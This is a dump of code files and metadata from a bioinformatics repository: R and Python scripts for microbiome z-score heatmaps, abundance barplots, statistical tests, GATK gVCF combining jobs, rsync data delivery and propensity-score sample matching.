"text": "# zscore 热图\n\n## 门\nlibrary(pheatmap)\ndt = read.table(\"zscore_phylum.txt\", header=TRUE, sep=\"\\t\", comment.char = \"\", check.names = T, row.names=1)\ncol_anno = read.table('annotation_col.txt', header=T, row.names = 1, sep=\"\\t\", check.names = 'F')\nann_colors = list(\"NCA vs sCAD\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"),\n \"NCA vs AMI\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"),\n \"sCAD vs AMI\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"))\npheatmap(dt, cluster_rows = F, color = colorRampPalette(c(\"navy\", \"white\", \"firebrick3\"))(50), annotation_col=col_anno, annotation_colors = ann_colors,fontsize = 8, cellheight = 20, cellwidth = 20, filename = 'phylum_zscore.pdf', width = 10, height = 8)\n\n\n#种\nlibrary(pheatmap)\ndt = read.table(\"zscore_species.txt\", header=TRUE, sep=\"\\t\", comment.char = \"\", check.names = T, row.names=1)\ncol_anno = read.table('species_annotation_col.txt', header=T, row.names = 1, sep=\"\\t\", check.names = 'F')\nann_colors = list(\"NCA vs sCAD\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"),\n \"NCA vs AMI\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"),\n \"sCAD vs AMI\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"))\npheatmap(dt, cluster_rows = F, color = colorRampPalette(c(\"navy\", \"white\", \"firebrick3\"))(50), annotation_col=col_anno, annotation_colors = ann_colors,fontsize = 8, cellheight = 8, cellwidth = 8, filename = 'species_zscore.pdf', width = 10, height = 8)\n\n#指定五个物种的 zscore\n\ndt = read.table(\"zscore_five_species.txt\", header=TRUE, sep=\"\\t\", comment.char = \"\", check.names = T, row.names=1)\ncol_anno = read.table('five_species_annotation_col.txt', header=T, row.names = 1, sep=\"\\t\", check.names = 'F')\nann_colors = list(\"NCA vs sCAD\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"),\n \"NCA vs AMI\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"),\n \"sCAD vs AMI\" = c( No.sig = \"#ffffff\", \"P<0.05\" = \"#9bc67a\" , \"P<0.01\" = \"#009845\"))\npheatmap(dt, cluster_rows = F, color = colorRampPalette(c(\"navy\", \"white\", \"firebrick3\"))(50), annotation_col=col_anno, annotation_colors = ann_colors,fontsize = 8, cellheight = 20, cellwidth = 20, filename = 'five_species_zscore.pdf', width = 10, height = 8)\n\n"
},
{
"alpha_fraction": 0.5960264801979065,
"alphanum_fraction": 0.6063281893730164,
"avg_line_length": 27.3125,
"blob_id": "4006232ec7d4aaae10ce28b52689e4e182e5a59f",
"content_id": "4799a52312e77ccc78143ada473d37b6d28b0929",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1359,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 48,
"path": "/rat/pvalue.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport pandas as pd\nimport glob,re\nlst = ['F_shannon','M_shannon','F_number','M_number']\nfor item in lst:\n\tsex = item.split('_')[0]\n\tarf = item.split('_')[1]\n\n# homogeneity p value\n\tfor time in ['expose','recovery']:\n\t\tprefix = sex + time +'_homogeneity_' + arf\n\t\tfilename = prefix + '.txt'\n\t\twith open(filename, 'r') as homogeneity:\n\t\t\tdt = pd.read_table(homogeneity, header=0, index_col=0)\n\t\t\thomogeneity_p = dt['Pr(>F)'][1]\n\t\t\tprint(prefix + ':')\n\t\t\tprint(homogeneity_p)\n#normality\n\tfor time in ['expose','recovery']:\n\t\tprefix = sex + time + '_normality_' + arf\n\t\tfilename = prefix + '.txt'\n\t\twith open(filename, 'r') as normality:\n\t\t\tdt = pd.read_table(normality, header=0, index_col=0)\n\t\t\tnormality_p = dt['p.value'][0]\n\t\t\tprint(prefix + ':')\n\t\t\tprint(normality_p)\n\t\n# annova\n\tfor time in ['expose','recovery']:\n\t\tprefix = sex + time + '_anova_' + arf\n\t\tfilename = prefix + '.txt'\n\t\twith open(filename, 'r') as anova:\n\t\t\tdt = pd.read_table(anova, header=0, index_col=0)\n\t\t\tanova_p = dt['Pr(>F)'][0]\n\t\t\tprint(prefix + ':')\n\t\t\tprint(anova_p)\n\n# Tukey\n\tfor time in ['expose','recovery']:\n\t\tprefix = sex + time +'_Tukey_' + arf\n\t\tfilename = prefix + '.txt'\n\t\twith open(filename, 'r') as Tukey:\n\t\t\tdt = pd.read_table(Tukey, header=0, index_col=0)\n\t\t\tTukey_p = dt['Group.p adj']\n\t\t\tprint(prefix + ':')\n\t\t\tprint(Tukey_p)\n\n\tprint('========')\n"
},
{
"alpha_fraction": 0.6278538703918457,
"alphanum_fraction": 0.6360730528831482,
"avg_line_length": 34.32258224487305,
"blob_id": "fa17f281511122072da4644a59d0e28d8f32ff46",
"content_id": "bdafe242e9d69d9f048913b5a8bb9df8036abd09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2242,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 62,
"path": "/rat/diff/FB_boxplt.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "import pandas as pd\n\n#F_expose\nF_expose = pd.read_table('F_expose_phylumProfileTable.xls', header=0, sep=\"\\t\", index_col = 0)\nF_expose_FB = F_expose.loc[['Firmicutes']]/F_expose.loc[['Bacteroidetes']].values # 两行相除,这个用法需要记住\nF_expose_FB.index = ['FB']\nF_expose_FB_T = F_expose_FB.T\n\n#M_expose\nM_expose = pd.read_table('M_expose_phylumProfileTable.xls', header=0, sep=\"\\t\", index_col = 0)\nM_expose_FB = M_expose.loc[['Firmicutes']]/M_expose.loc[['Bacteroidetes']].values\nM_expose_FB.index = ['FB']\nM_expose_FB_T = M_expose_FB.T\n\n#F_recovery\nF_recovery = pd.read_table('F_recovery_phylumProfileTable.xls', header=0, sep=\"\\t\", index_col = 0)\nF_recovery_FB = F_recovery.loc[['Firmicutes']]/F_recovery.loc[['Bacteroidetes']].values\nF_recovery_FB.index = ['FB']\nF_recovery_FB_T = F_recovery_FB.T\n\nM_recovery = pd.read_table('M_recovery_phylumProfileTable.xls', header=0, sep=\"\\t\", index_col = 0)\nM_recovery_FB = M_recovery.loc[['Firmicutes']]/M_recovery.loc[['Bacteroidetes']].values\nM_recovery_FB.index = ['FB']\nM_recovery_FB_T = M_recovery_FB.T\n\nmerge = pd.concat([F_expose_FB_T,M_expose_FB_T,F_recovery_FB_T,M_recovery_FB_T])\nmerge.to_csv('F_B_ratio.txt', sep=\"\\t\")\n\nimport re\nwith open('F_B_ratio.txt','r') as IN, open('F_B_ratio_boxplot.txt','w') as out:\n\thead = IN.readline().strip('\\n').split('\\t')[1]\n\tprint('SampleID\\t' + head + '\\tsubgroup\\tgroup', file=out)\n\tfor line in IN:\n\t\tlst = line.strip('\\n').split('\\t')\n\t\tif not lst[0].endswith('-a'):\n\t\t\tif re.match('Cig\\-F', lst[0]):\n\t\t\t\tsubgroup = 'Cigarette'\n\t\t\t\tgroup = 'F_expose' # 根据命名分组,不具有普适性... \n\t\t\telif re.match('Cig\\-M', lst[0]):\n\t\t\t\tsubgroup = 'Cigarette'\n\t\t\t\tgroup = 'M_expose'\n\t\t\telif re.match('EL\\-F', lst[0]):\n\t\t\t\tsubgroup = 'E-liquid'\n\t\t\t\tgroup = 'F_expose'\n\t\t\telse:\n\t\t\t\tsubgroup = 'E-liquid'\n\t\t\t\tgroup = 'M_expose'\n\t\telse:\n\t\t\tif re.match('Cig\\-F', lst[0]):\n\t\t\t\tsubgroup = 'Cigarette'\n\t\t\t\tgroup = 'F_recovery'\n\t\t\telif re.match('Cig\\-M', lst[0]):\n\t\t\t\tsubgroup = 'Cigarette'\n\t\t\t\tgroup = 'M_recovery'\n\t\t\telif re.match('EL\\-F', lst[0]):\n\t\t\t\tsubgroup = 'E-liquid'\n\t\t\t\tgroup = 'F_recovery'\n\t\t\telse:\n\t\t\t\tsubgroup = 'E-liquid'\n\t\t\t\tgroup = 'M_recovery'\n\t\toutline = '\\t'.join([lst[0],lst[1],subgroup,group])\n\t\tprint(outline, file=out)\n"
},
{
"alpha_fraction": 0.6520717740058899,
"alphanum_fraction": 0.6621102094650269,
"avg_line_length": 40.43362808227539,
"blob_id": "965e0a0614c6cd2ac505088a4dd1e04dd8379247",
"content_id": "55d4124bf6357d18a6d8f023b42bacc4c86363cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4706,
"license_type": "no_license",
"max_line_length": 546,
"num_lines": 113,
"path": "/barplot.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3 \nimport argparse,re\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\ngenerate the barplot based on abundance file.\nExample: python3 barplot.py -i phylumProfileTable.xls -o Process -r 0.01\nTo be continued.\n------------------'''\n)\n#parser = argparse.ArgumentParser(description = \"based on the abundance file,get the tax ID for with relative abundance bigger than some value(eg: 0.01) at least in one sample, tax with relative abundance less than this values will be merged as others in next step.\")\n#parser = argparse.ArgumentParser(description = \"based on the abundance file,get the tax ID for with abundance bigger than some value(eg: 0.01) at least in one sample, for the x axis text of barplot of before and after two groups...not very clear.\") +_+|| 确实没看懂..\nparser.add_argument('-i','--Input', help = \"the input file\")\nparser.add_argument('-r','--rate', help = \"the value for selecting tax ID, default in 0.\", nargs='?')\nparser.add_argument('-o','--Output', help = \"the output directory\")\nargs=parser.parse_args()\n(Input,Output) = (args.Input,args.Output)\n\nrate = args.rate if args.rate else 0\n\nif not Input or not Output:\n\tparser.print_help() \n\texit()\n\n'''\nimport os,shutil\nif os.path.exists(Output):\n\tshutil.rmtree(Output)\nos.makedirs(Output)\n'''\n\n# get the tax ID needed!\nmatch = re.match('(.*)ProfileTable',Input.split(\"/\")[-1])\nlevel = match.group(1)\nIDlist = list()\nwith open(Input,'r') as IN:\n\tIN.readline()\n\tfor line in IN:\n\t\tlst = line.strip('\\n').split('\\t')\n\t\tfor index in range(1,len(lst)):\n\t\t\tif float(lst[index]) > float(rate) :\n\t\t\t\tIDlist.append(lst[0])\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tcontinue\n\n# output the barplot.txt file\noutfile = Output +'/' + level + \"Barplot.txt\"\nwith open(Input, \"r\") as IN, open(outfile, \"w\") as out:\n\tout.write('individual\\tlevel\\tabundance\\n')\n\thead = IN.readline().strip('\\n').split('\\t')\n\tDict = dict()\n\tfor element in head[1:]:\n\t\tDict[element] = 0\n\tfor line in IN:\n\t\tlst = line.strip('\\n').split('\\t')\n\t\ttaxonomy = lst[0]\n\t\tfor index in range(1,len(lst)):\n\t\t\tif taxonomy not in IDlist:\n\t\t\t\tDict[head[index]] = Dict[head[index]] + float(lst[index])\n\t\t\telse:\n\t\t\t\tkey = head[index] + \"\\t\" + taxonomy + \"\\t\" + lst[index]\n\t\t\t\tDict[key] = head[index]\n\tfor key in Dict:\n\t\tif key in head and Dict[key] == 0:\n\t\t\tcontinue\n\t\telif key in head:\n\t\t\tout.write(key + '\\tOthers\\t' + str(Dict[key]) + '\\n')\n\t\telse:\n\t\t\tkeys = key.split('\\t')\n\t\t\tindiv = keys[0]\n\t\t\ttaxonomy = keys[1]\n\t\t\tabund = keys[2]\n\t\t\tout.write(indiv + '\\t' + taxonomy + '\\t' + abund + '\\n')\n\n# get the taxID order and sampleID order for drawing barplot\nimport pandas as pd\ndt = pd.read_table(outfile)\ntax_order = list(dt.groupby('level').abundance.mean().sort_values(ascending=False).index)\nif 'Others' in tax_order:\n\ttax_order.remove('Others')\n\ttax_order.append('Others')\nsample_order = list(dt.loc[dt['level'] == tax_order[0]].groupby('individual').abundance.mean().sort_values().index)\n\n#generate barplot Rscript\ncolor_list = list()\nwith open('color.txt', 'r') as color:\n\tcolor_list = color.read().split('\\n') # 一次性读取文件\n\ncolor_list.pop(-1)\ncolor_list = color_list[:len(tax_order)]\nplot_tax_order = ','.join(['\"' + x + '\"' for x in tax_order])\nplot_sample_order = ','.join(['\"' + x + '\"' for x in 
sample_order])\nplot_color = ','.join(['\"' + x + '\"' for x in color_list])\noutplot = Output +'/' + level + 'Barplot.pdf'\nplot_script = Output +'/' + level + 'ProfileBarplot.R'\nwith open(plot_script, 'w') as rscript:\n\tprint('#! /usr/bin/Rscript', file=rscript)\n\tprint('dt = read.table(\"' + outfile + '\",header = T, sep = \"\\\\t\")', file=rscript)\n\tprint('library(ggplot2)', file=rscript)\n\tprint('sampleID = c(' + plot_sample_order + ')', file=rscript)\n\tprint('legendID = c(' + plot_tax_order + ')', file=rscript)\n\tprint('color = c(' + plot_color + ')', file=rscript)\n\tprint('dt$individual_order = factor(dt$individual, level=sampleID)', file=rscript)\n\tprint('ggplot(dt,aes(x=dt$individual_order,y=dt$abundance,fill=factor(dt$level,levels=rev(legendID)))) + geom_bar(stat = \"identity\", color = \"#56666B\", size = 0.1) + labs(x = \"Inidividuals\", y = \"Relative Abundance\") + theme_bw() + theme(axis.title = element_text(size = 12), axis.text = element_text(colour = \"black\", size = 10), axis.text.x = element_text(hjust = 1,angle=65,color=\"black\"),legend.title = element_blank(),legend.key.size=unit(3,\"mm\"), legend.text=element_text(size=10)) + scale_fill_manual(values = rev(color))', file=rscript)\n\tprint('ggsave(\"' + outplot + '\", width=6, height=4)', file=rscript)\n\tprint('unlink(\"Rplots.pdf\")', file=rscript)\n\n# plot \nimport os\nos.system('Rscript ' + plot_script)\n"
},
{
"alpha_fraction": 0.5824432373046875,
"alphanum_fraction": 0.5931241512298584,
"avg_line_length": 41.197181701660156,
"blob_id": "3cd3f936ca9abb96ca09a84276c246ac1446ad18",
"content_id": "3d4810be8475e79ff881c718eb630ad6977537ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2996,
"license_type": "no_license",
"max_line_length": 295,
"num_lines": 71,
"path": "/run_Combine_gvcf.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport argparse,re,os,math,glob\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nCombine the gvcf files into vcf file.\nExample: python3 run_Combine_gvcf.py -i allSample.list -t intervals.list -r gvcfDir.list -o Test -q qsub.sh\nTo be continued.\n------------------'''\n)\nparser.add_argument('-i','--Input', help = \"the sampleID file.\")\nparser.add_argument('-t','--Interval', help = \"the intervals list file.\")\nparser.add_argument('-r','--gvcf', help = \"the gvcf file directory list file.\")\nparser.add_argument('-o','--outdir', help = \"the outdir.\")\nparser.add_argument('-q','--qsub', help = \"the final qsub file.\")\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs = parser.parse_args()\nsampleList = args.Input\nintervalsList = args.Interval\ngvcfDir = args.gvcf\noutdir = args.outdir\nqsub = args.qsub\npar = [sampleList,intervalsList,gvcfDir,outdir,qsub]\n\nif not all(par):\n parser.print_help()\n exit()\n\nif os.path.isfile(qsub):\n os.remove(qsub)\n\nSampleDir = dict()\nwith open(gvcfDir,'r') as IN:\n for line in IN:\n gvcf_dir = line.strip('\\n')\n for item in glob.glob(gvcf_dir + '/*'):\n key = item.split('/')[-1]\n SampleDir[key] = gvcf_dir\n\nwith open(intervalsList,'r') as IN:\n for line in IN:\n interLine = line.strip('\\n')\n Chr = interLine.split('/')[-2]\n chrdir = '/'.join([outdir,Chr])\n\n if not os.path.isdir(chrdir):\n os.makedirs(chrdir)\n\n gvcfs = ''\n with open(sampleList,'r') as Sample:\n for sampleline in Sample:\n sampleID = sampleline.strip('\\n')\n gatkName = '.'.join([sampleID,Chr,'g.vcf.gz'])\n if sampleID in SampleDir:\n eachGvcf = '/'.join([SampleDir[sampleID],sampleID,'callGVCF_GATK',gatkName])\n else:\n print('Error: sample ID: ' + sampleID + ' is not in the gvcf dir,please check your file.')\n gvcfs = gvcfs + \" --variant \" + eachGvcf\n prefix = os.path.basename(interLine).replace(\".intervals\", \"\")\n outgvcf = chrdir + \"/\" + prefix + \".g.vcf.gz\"\n shell = chrdir + \"/CombineGvcf_\" + prefix + \".sh\"\n with open(shell,'w') as out:\n out.write('set -e\\necho Start at : `date`\\n')\n shell_line = \" \".join([\"java -Xmx10g -Djava.io.tmpdir=\" + outdir, \"-jar /zfssz2/BC_COM_P7/F17HTSCCWLJ1810/HUMqqmR/s8.gvcf/bin/GenomeAnalysisTK.jar -R /zfssz2/BC_COM_P7/F17HTSCCWLJ1810/HUMqqmR/s8.gvcf/hg19_fa/hg19.fasta -T CombineGVCFs\", gvcfs, \"-o\", outgvcf, \"-L\", interLine]) + \"\\n\"\n out.write(shell_line)\n out.write(\"echo End at : `date`\\n\")\n out.write(\"echo Work is completed! > \" + shell + \".sign\\n\")\n with open (qsub,'a') as out:\n out.write(\"qsub -o %s -e %s -l vf=2G,p=1 -q bc.q -P HUMrqkR %s\\n\" % (chrdir, chrdir, shell))\n"
},
{
"alpha_fraction": 0.7397260069847107,
"alphanum_fraction": 0.7511415481567383,
"avg_line_length": 35.5,
"blob_id": "f7132b210c61114f6de4fa4928e32728e8b28c14",
"content_id": "3de40858e4cddb402303fdc1a631f860db8b4c70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 12,
"path": "/data_delivery_rsyncs.sh",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /bin/bash\n#exampel sh data_delivery_rsyncs.sh file.list Temp account password IP\nlist_file=$1 #file_path or dir_path (permit the soft link each line\ndest_dir=$2 #the destination directory\naccount=$3 #your account\npassword=$4 #your password\nip=$5 #destination IP\ncat $list_file | while read line\ndo\necho \"Processing file:rsync the $line to $dest_dir\"\nexpect data_delivery_rsync.expect $line $dest_dir $account $password $ip\ndone\n"
},
{
"alpha_fraction": 0.6254545450210571,
"alphanum_fraction": 0.6545454263687134,
"avg_line_length": 44.83333206176758,
"blob_id": "be9f11ca3d5fe81b3f3787e6489efb72622c8b84",
"content_id": "64311cf533a3bac0436ad1f2b96d691253c899b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 343,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 6,
"path": "/upset.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "library(UpSetR,lib.loc = \"/installpath/R_lib\") #指定加载包的路径\npdf(\"upset.pdf\", width=8,height=6, onefile = FALSE) #输出到 pdf 文件,并且取消第一页的空白页\ngene <- read.csv('Data/upset.csv', header = T, sep = '\\t') \nupset(gene, order.by = \"degree\", mb.ratio = c(0.70, 0.30))\ndev.off()\n# 就这么简单,成图..\n"
},
{
"alpha_fraction": 0.6515804529190063,
"alphanum_fraction": 0.672773003578186,
"avg_line_length": 52.519229888916016,
"blob_id": "1bee60c6b5cc7975e396881bda16771f7573ca5e",
"content_id": "6468c393963c25f9b455a12ff86014652cdb5785",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3040,
"license_type": "no_license",
"max_line_length": 182,
"num_lines": 52,
"path": "/gout/group_barplot.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "\nimport pandas as pd\ndt = pd.read_table(\"Gout_10gene_phylum_abundance_profile.xls\", header = 0, index_col=0)\ngroup = pd.read_table(\"Sample_information_detail_drug_20180806.xls\", header = 0, index_col=0)\n\n#dt_melt.columns.values[0] = 'Tax'\n# 得到丰度前五的物种,将剩下的合并\ndt_melt = pd.melt(dt.reset_index(), id_vars='index', value_vars = list(dt.columns)[0:], var_name = 'SampleID', value_name = 'Abundance') \ntax_mean = dt_melt.groupby('index').mean().sort_values(by = 'Abundance', ascending = False)\ntax_retain = list(tax_mean.index[:5])\ntax_others = list(tax_mean.index[5:])\ndt_retain = dt.loc[tax_retain]\ndt_others = dt.loc[tax_others].sum().to_frame(name = 'Others').T\ndt_merge = pd.concat([dt_retain, dt_others])\n\n## 根据合并后的丰度表,生成画 barplot 的柱状图文件\n#ha = pd.melt(temp, id_vars = ['Description'], value_vars = list(temp.columns)[:-1], var_name = '', value_name = 'Abundance') \n# id_vars 表示不变的列名, value_vars 表示置换的列名,var_name 变化后的列名,这里是组名, value_name 是变化后的数值列名\ndt_merge_melt = pd.melt(dt_merge.reset_index(), id_vars='index', value_vars = list(dt_merge.columns)[0:], var_name = 'SampleID', value_name = 'Abundance') \ndt_merge_melt.columns.values[0] = 'Tax'# 这里有雷,melt 以后重命名,在更改列名,会出现无法调用的情况,待定\n#dt_merge_melt\n\n#获取分组名\nsample_group = group['SamplingTime'].to_frame().reset_index()\nsample_group.columns.values[0] = 'SampleID'\nbarplot_dt = pd.merge(dt_merge_melt, sample_group, left_on = 'SampleID', right_on = 'SampleID')\nbarplot_dt.to_csv('gout_phylum_barplot.txt', sep = '\\t', index = 0)\n\n# 得到画图的物种顺序\ncontrol = barplot_dt.loc[(barplot_dt['Tax'] == 'Bacteroidetes') & (barplot_dt['SamplingTime'] == 'Control')]\ncontrol_list = list(control.sort_values(by='Abundance')['SampleID'])\n\nT0 = barplot_dt.loc[(barplot_dt['Tax'] == 'Bacteroidetes') & (barplot_dt['SamplingTime'] == 'T0')]\nT0_list = list(T0.sort_values(by='Abundance')['SampleID'])\n\nT1 = barplot_dt.loc[(barplot_dt['Tax'] == 'Bacteroidetes') & (barplot_dt['SamplingTime'] == 'T1')]\nT1_list = list(T1.sort_values(by='Abundance')['SampleID'])\n\nT2 = barplot_dt.loc[(barplot_dt['Tax'] == 'Bacteroidetes') & (barplot_dt['SamplingTime'] == 'T2')]\nT2_list = list(T2.sort_values(by='Abundance')['SampleID'])\n\nT3 = barplot_dt.loc[(barplot_dt['Tax'] == 'Bacteroidetes') & (barplot_dt['SamplingTime'] == 'T3')]\nT3_list = list(T3.sort_values(by='Abundance')['SampleID'])\n\nsample_order = control_list + T0_list + T1_list + T2_list + T3_list\ntax_order = list(dt_merge.index)\n\n# R 画图的输入参数\nR_sample_order = \":\".join(sample_order)\nR_tax_order = \":\".join(tax_order)\nR_color_order = ':'.join([\"#99c885\", \"#e5abeb\", \"#e5ffb3\",\"#49e4f2\"]) # 来源网站\nwith open ('out.sh', 'w') as out:\n print('Rscript gout_group_barplot.R -i gout_phylum_barplot.txt -t ' + R_tax_order + ' -s ' + R_sample_order + ' -r Control:T0:T1:T2:T3 -c ' + R_color_order + ' -p gout_phylum')\n"
},
{
"alpha_fraction": 0.663339376449585,
"alphanum_fraction": 0.6687840223312378,
"avg_line_length": 80.62963104248047,
"blob_id": "13d1fb881d502fd92b73447d49e3ca172cb0c5f8",
"content_id": "c0b9944d41086aeb6006bab1efcbaba14e02928d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2352,
"license_type": "no_license",
"max_line_length": 342,
"num_lines": 27,
"path": "/Phenotype/propensity_score.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "library(\"MatchIt\")\n\n# 获取 FS 匹配的 CS ,之所以选 FS 为「对照」组是因为它的样品数目最少,可以可其他两组最大化配对;\ndt = read.table('Samle_Information.xls', sep = '\\t', row.names = 1, header = T)\ndt = dt[c('Group','Age', 'BMI', 'Ethnicity','Gender','Married','Breakfast','Diet','Vegetable','Fruit','Meat','Dairy.products','Coarse.grain','Eggs','Drinking','Antibiotic','Mouthwash','Oral.ulcer','Bleeding.gums','Dental.caries','Pulpitis','Periodontitis','Constipation','Insomnia','Cold','Sore.throat')] #对所有这些因素进行综合评分挑选样品\ndt = dt[dt['Group'] != 'NS',]\ntemp = rownames(dt)\ndt = dt %>% mutate(Group = ifelse(Group == 'FS', 1, 0))\nrownames(dt)= temp\nm = matchit(Group ~ Age + BMI + Ethnicity + Gender + Married + Breakfast + Diet + Vegetable + Fruit + Meat + Dairy.products + Coarse.grain + Eggs + Drinking + Antibiotic + Mouthwash + Oral.ulcer + Bleeding.gums + Dental.caries + Pulpitis + Periodontitis + Constipation + Insomnia + Cold + Sore.throat ,data = dt,method =\"nearest\", ratio =1) \nmatched <- match.data(m)\ncs_id = rownames(matched[matched['Group'] == 0,])\n\n# 获取 FS 匹配的 NS\ndt = read.table('Samle_Information.xls', sep = '\\t', row.names = 1, header = T)\ndt = dt[c('Group','Age', 'BMI', 'Ethnicity','Gender','Married','Breakfast','Diet','Vegetable','Fruit','Meat','Dairy.products','Coarse.grain','Eggs','Drinking','Antibiotic','Mouthwash','Oral.ulcer','Bleeding.gums','Dental.caries','Pulpitis','Periodontitis','Constipation','Insomnia','Cold','Sore.throat')]\ndt = dt[dt['Group'] != 'CS',]\ntemp = rownames(dt)\ndt = dt %>% mutate(Group = ifelse(Group == 'FS', 1, 0))\nrownames(dt)= temp\nm = matchit(Group ~ Age + BMI + Ethnicity + Gender + Married + Breakfast + Diet + Vegetable + Fruit + Meat + Dairy.products + Coarse.grain + Eggs + Drinking + Antibiotic + Mouthwash + Oral.ulcer + Bleeding.gums + Dental.caries + Pulpitis + Periodontitis + Constipation + Insomnia + Cold + Sore.throat, data = dt,method =\"nearest\", ratio =1)\nmatched <- match.data(m)\nns_id = rownames(matched[matched['Group'] == 0,])\nfs_id = rownames(dt[dt['Group'] == '1',])\n\ndt = read.table('Samle_Information.xls', sep = '\\t', row.names = 1, header = T)\nwrite.table(dt[c(fs_id,cs_id,ns_id),], file = 'matched_Samle_Information.xls', sep = \"\\t\",quote = F) #输出配对后的表型信息表\n"
},
{
"alpha_fraction": 0.6582515239715576,
"alphanum_fraction": 0.6769518256187439,
"avg_line_length": 48.74418640136719,
"blob_id": "75d3a04235583f3ad1ea956036157bc50bb46f72",
"content_id": "0d05cd4a93c49ae8833650af568e72e1705d549b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2201,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 43,
"path": "/Temp/phylum_zscore.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 计算蔡军 门 水平的 Zscore\n## 计算 z core\ndt = pd.read_table('CJ_phylum_abd.txt', index_col=0)\ndt = dt.drop(['Tax_detail'], axis=1)\ngroup = pd.read_table('CJ_phylum_map.txt', index_col=0)\nfrom scipy.stats import zscore\ndt_z = dt.apply(zscore, ddof=1, axis=1).T ## 这行是用来计算 zscore\nControl_mean = dt_z.loc[group.loc[group['Description'] == 'Control'].index].mean().to_frame(name='Control')\nCHD_mean = dt_z.loc[group.loc[group['Description'] == 'CHD'].index].mean().to_frame(name='CHD')\nSTEMI_mean = dt_z.loc[group.loc[group['Description'] == 'STEMI'].index].mean().to_frame(name='STEMI')\nz_merge = pd.concat([Control_mean,CHD_mean,STEMI_mean], axis=1)\n\n# 提取差异物种 ID\nControl_CHD = pd.read_table('Phylum.Control-CHD.wilcox.test.xls', index_col=0)\nSTEMI_Control = pd.read_table('Phylum.STEMI-Control.wilcox.test.xls', index_col=0)\nSTEMI_CHD = pd.read_table('Phylum.STEMI-CHD.wilcox.test.xls', index_col=0)\n\nControl_CHD_diff = list(Control_CHD.loc[Control_CHD['qvalue'] < 0.05].index)\nSTEMI_Control_diff = list(STEMI_Control.loc[STEMI_Control['qvalue'] < 0.05].index)\nSTEMI_CHD_diff = list(STEMI_CHD.loc[STEMI_CHD['qvalue'] < 0.05].index)\ndiff_tax = Control_CHD_diff + STEMI_Control_diff + STEMI_CHD_diff\ndiff_tax = list(set(diff_tax)) # 去重复\nz_plot = z_merge.loc[diff_tax].T\nz_plot.to_csv('CJ_zscore_phylum.txt', sep=\"\\t\")\n\n#注释的表格\ntemp = STEMI_Control.loc[STEMI_Control['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'p_png' if x < 0.01 else 'lessp_png' for x in temp['qvalue']]\ntemp['Control vs STEMI'] = label\nSTEMI_Control_p = temp.drop(['qvalue'], axis=1)\n\ntemp = Control_CHD.loc[Control_CHD['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'p_png' if x < 0.01 else 'lessp_png' for x in temp['qvalue']]\ntemp['Control vs CHD'] = label\nControl_CHD_p = temp.drop(['qvalue'], axis=1)\n\ntemp = STEMI_CHD.loc[STEMI_CHD['qvalue'] < 0.05]['qvalue'].to_frame()\nlabel = [ 'p_png' if x < 0.01 else 'lessp_png' for x in temp['qvalue']]\ntemp['CHD vs STEMI'] = label\nSTEMI_CHD_p = temp.drop(['qvalue'], axis=1)\n\nall_p = pd.concat([STEMI_Control_p,Control_CHD_p,STEMI_CHD_p], axis=1)\nall_p.fillna('no_sig_png').to_csv('CJ_phylum_annotation_col.txt', sep='\\t')\n"
},
{
"alpha_fraction": 0.6695442199707031,
"alphanum_fraction": 0.6909530162811279,
"avg_line_length": 35.20000076293945,
"blob_id": "cb93c6b25a62e3131d6486efa5351bd683e1041f",
"content_id": "0fbdb9f80972d2f355a763ccb96d049bd0d9aa12",
"detected_licenses": [],
"is_generated": false,
